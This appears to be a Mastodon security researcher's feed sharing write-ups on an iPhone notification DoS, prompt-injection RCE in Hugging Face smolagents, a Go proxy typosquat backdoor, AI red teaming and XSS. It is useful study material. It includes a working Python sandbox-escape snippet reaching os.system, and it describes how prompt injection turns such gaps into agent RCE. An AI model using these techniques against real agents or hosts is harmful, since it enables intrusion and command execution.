Joseph Zeng

@josephzeng@infosec.exchange
94 Followers
15 Following
126 Posts
All opinions and posts are my own.
My employers (past or present) are not responsible for them and may not agree with them.
Posts do not imply endorsement or agreement as I may just be sharing a discussion/topic of interest.
Twitter (former): https://x.com/josephzengx
GitHub (For Verification): https://josz5930.github.io/
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), an open Bug Bounty-ready Artificial Intelligence


GitHub

CVE-2025-24091 - sending Darwin notifications to DoS an iPhone

POC: Widget extension VeryEvilNotify šŸ˜€

Blog Post:
https://rambo.codes/posts/2025-04-24-how-a-single-line-of-code-could-brick-your-iphone

#iOS #cybersecurity

How a Single Line Of Code Could Brick Your iPhone | Rambo Codes

Gui Rambo writes about his coding and reverse engineering adventures.

Rambo Codes
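
For context on the mechanism: Darwin notifications are posted via the notify_post() API from libSystem, and, as the write-up explains, posting one requires no special privileges or entitlements, which is what made the bug reachable from a sandboxed widget extension. Below is a minimal sketch of the call from Python on macOS via ctypes; the notification name is a harmless placeholder, deliberately not the privileged name abused in the CVE.

```python
# Hedged sketch: posting a Darwin notification from Python on macOS.
# The name below is a placeholder; CVE-2025-24091 abused a privileged
# system notification name that is intentionally not reproduced here.
import ctypes

libsystem = ctypes.CDLL("/usr/lib/libSystem.B.dylib")
libsystem.notify_post.argtypes = [ctypes.c_char_p]
libsystem.notify_post.restype = ctypes.c_uint32

# notify_post() is fire-and-forget and needs no entitlement, so any app,
# widget, or script can broadcast to every process listening for the name.
status = libsystem.notify_post(b"com.example.harmless.demo")
print("notify_post returned:", status)  # 0 == NOTIFY_STATUS_OK
```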

The writer exposed a critical vulnerability in Hugging Face’s smolagents, a lightweight AI agent framework. By leveraging prompt injection to bypass ā€œsafeā€ module restrictions, attackers can execute arbitrary OS commands, highlighting mounting security risks for autonomous AI systems. - o3-mini summary

https://magic-box.dev/hacking/smoltalk/

#ai #rce #cybersecurity

smoltalk: RCE in Open Source Agents

Big shoutout to Hugging Face and the smolagents team for their cooperation and quick turnaround for a fix!
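
The write-up's exact bypass isn't reproduced here, but the class of problem is illustrated by the classic Python attribute-traversal escape that any "safe module allowlist" interpreter has to block: reaching os.system from bare builtins, with no import statement for the blocked module.

```python
# Hedged illustration: the well-known attribute-traversal pattern used to
# escape Python "safe module" sandboxes in general. This is NOT claimed to
# be the exact smolagents bypass from the write-up.
# Walk from a harmless literal up to object, then down to os._wrap_close,
# whose __init__ was defined in os.py and therefore carries os's globals.
subclasses = ().__class__.__base__.__subclasses__()
wrap_close = next(c for c in subclasses if c.__name__ == "_wrap_close")
os_globals = wrap_close.__init__.__globals__
os_globals["system"]("echo escaped the allowlist")  # arbitrary OS command
```

When the interpreted code is written by an LLM, prompt injection turns any such gap into RCE: the attacker needs no foothold on the host, only influence over text the agent reads.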

This write-up reveals how attackers exploited the Go Module Proxy's caching to keep distributing malicious code even after the upstream repository was updated. The attack went undetected for years, highlighting a serious supply chain vulnerability.

Takeaways:
• Proxy caching features can be weaponized
• Traditional security measures may miss these attacks
• Urgent need for enhanced package verification

šŸ’” Action Items for Dev Teams:

• Implement strict cache control
• Enhance module monitoring
• Strengthen dependency validation

#cybersecurity #supplychain

https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence

Go Supply Chain Attack: Malicious Package Exploits Go Module...

Socket researchers uncovered a backdoored typosquat of BoltDB in the Go ecosystem, exploiting Go Module Proxy caching to persist undetected for years.

Socket
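
The persistence comes from a by-design property: proxy.golang.org treats published module versions as immutable and keeps serving its cached copy even after the upstream repository is retagged or cleaned. Here is a small sketch against the proxy's documented HTTP API; the module path is an ordinary example, not the malicious typosquat.

```python
# Hedged sketch: list what the public Go module proxy has cached for a
# module, using its documented /@v/list endpoint. Cached versions keep
# being served regardless of later changes to the upstream repository.
import urllib.request

# Example path, not the typosquat. Note: uppercase letters in module
# paths would need Go's "!"-escaping; this path is all lowercase.
module = "github.com/boltdb/bolt"
url = f"https://proxy.golang.org/{module}/@v/list"

with urllib.request.urlopen(url) as resp:
    versions = resp.read().decode().split()

print(f"Proxy-cached versions of {module}:")
for v in sorted(versions):
    print(" ", v)
```

Comparing what the proxy actually serves against the upstream VCS at the pinned version is one concrete way to act on the "strengthen dependency validation" item above.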

OWASP Threat and Controls Periodic table

https://owaspai.org/goto/periodictable/

#ai

0. AI Security Overview – AI Exchange

Comprehensive guidance and alignment on how to protect AI against security threats - by professionals, for professionals.

Microsoft’s AI red team has tested over 100 generative AI products and uncovered three essential lessons. First, red teaming is the starting point for identifying both security vulnerabilities and potential harms as part of responsible AI risk management; this includes spotting bias, data leakage, or other unintended consequences early in product development. Second, human expertise is indispensable for addressing complex AI threats: while automated tools can detect issues, they can’t fully capture the nuanced misuse scenarios and policy gaps that experts can identify. Third, a defense-in-depth strategy is crucial for safeguarding AI systems: continuous testing, multiple security layers, and adaptive defenses collectively help mitigate risks, as no single measure can eliminate vulnerabilities in ever-evolving models. By combining proactive stress testing, expert analysis, and layered protections, organizations can better navigate the opportunities and challenges presented by generative AI. - LLM Summary

https://www.microsoft.com/en-us/security/blog/2025/01/13/3-takeaways-from-red-teaming-100-generative-ai-products/

#ai

3 takeaways from red teaming 100 generative AI products | Microsoft Security Blog

The growing sophistication of AI systems and Microsoft’s increasing investment in AI have made red teaming more important than ever. Learn more.

Microsoft Security Blog

MIT AI Risk Repository

https://airisk.mit.edu/

#ai

The MIT AI Risk Repository

A comprehensive living database of over 1600 AI risks categorized by their cause and risk domain

A Cloud Guru terminates "lifetime" course access, citing the plan "being retired".

#cloud #pluralsight

Neural Fictitious Self-Play (NFSP) for Imperfect-Information Games

Reinforcement learning "improviser" and supervised learning "planner"

Blog post and explanation: https://ai.gopubby.com/neural-fictitious-self-play-nfsp-for-imperfect-information-games-0a8189770240

Research paper (not recent):
https://arxiv.org/abs/1603.01121v2

#ai

Neural Fictitious Self-Play (NFSP) for Imperfect-Information Games

Picture yourself at a high-stakes poker table, heart pounding as you weigh your next move with incomplete information. This core challenge of strategic decision-making under uncertainty isn’t just a…

AI Advances
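
In brief: each NFSP agent keeps two learners. A reinforcement learner approximates a best response to opponents' current behavior, and a supervised learner imitates the agent's own past best responses, approximating the fictitious-play average strategy; play mixes the two via an anticipatory parameter. Below is a runnable toy of that control flow with tabular stand-ins for the paper's neural networks, on matching pennies as a stand-in game.

```python
# Toy sketch of NFSP's control flow (Heinrich & Silver, 2016), with tabular
# stand-ins for the two networks: a Q-table for the RL best response
# ("improviser") and action counts for the SL average policy ("planner").
import random
from collections import defaultdict

ACTIONS = (0, 1)
ETA, EPS, ALPHA = 0.1, 0.1, 0.05  # anticipatory, exploration, learning rate

q = defaultdict(lambda: [0.0, 0.0])   # stand-in for the DQN (best response)
counts = defaultdict(lambda: [1, 1])  # stand-in for the SL average-policy net

def act(player):
    if random.random() < ETA:
        # Best-response mode: epsilon-greedy on Q, and record the choice so
        # the average policy can imitate past best responses (the SL memory).
        if random.random() < EPS:
            a = random.choice(ACTIONS)
        else:
            a = max(ACTIONS, key=lambda x: q[player][x])
        counts[player][a] += 1
        return a
    # Average-policy mode: play the empirical mixture of past best responses.
    c = counts[player]
    return 0 if random.random() * (c[0] + c[1]) < c[0] else 1

def learn(player, a, reward):
    # One-shot game, so a bandit-style update stands in for the DQN's TD step.
    q[player][a] += ALPHA * (reward - q[player][a])

for _ in range(50_000):
    a0, a1 = act("p0"), act("p1")
    r = 1.0 if a0 != a1 else -1.0  # matching pennies: p0 wins on a mismatch
    learn("p0", a0, r)
    learn("p1", a1, -r)

c = counts["p0"]
print("p0 average policy:", [n / (c[0] + c[1]) for n in c])  # ~[0.5, 0.5]
```

In zero-sum games it is the average strategy that converges, so it's the counts table, not the Q-table, that should approach the 50/50 equilibrium here.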

Series on "Beyond XSS" including topics such as Cross-site leaks and CSTI

https://aszx87410.github.io/beyond-xss/en/

Very appropriately, it was built using Docusaurus, a static site generator.

#xss #cybersecurity

About This Series | Beyond XSS

As a software engineer, you must be familiar with information security. In your work projects, you may have gone through security audits, including static code scanning, vulnerability scanning, or penetration testing. You may have even done more comprehensive red team exercises. Apart from that, you may have heard of OWASP and have a general idea of what OWASP Top 10 includes and what common security vulnerabilities exist.
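
As a refresher on the baseline the series goes beyond, here's a toy of my own (a hypothetical Flask app, not from the series) showing the canonical reflected XSS and its fix.

```python
# Hedged toy: the classic reflected-XSS mistake, interpolating user input
# into HTML without escaping. App and routes are illustrative only.
from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)

@app.route("/greet")
def greet():
    name = request.args.get("name", "")
    # Vulnerable: /greet?name=<script>alert(1)</script> runs in the browser.
    return f"<h1>Hello {name}</h1>"

@app.route("/greet-safe")
def greet_safe():
    # Fixed: HTML-escape untrusted input before it reaches the markup.
    return f"<h1>Hello {escape(request.args.get('name', ''))}</h1>"
```

Template engines like Jinja2 escape by default; the bug typically appears exactly where output bypasses them, as in the f-string above.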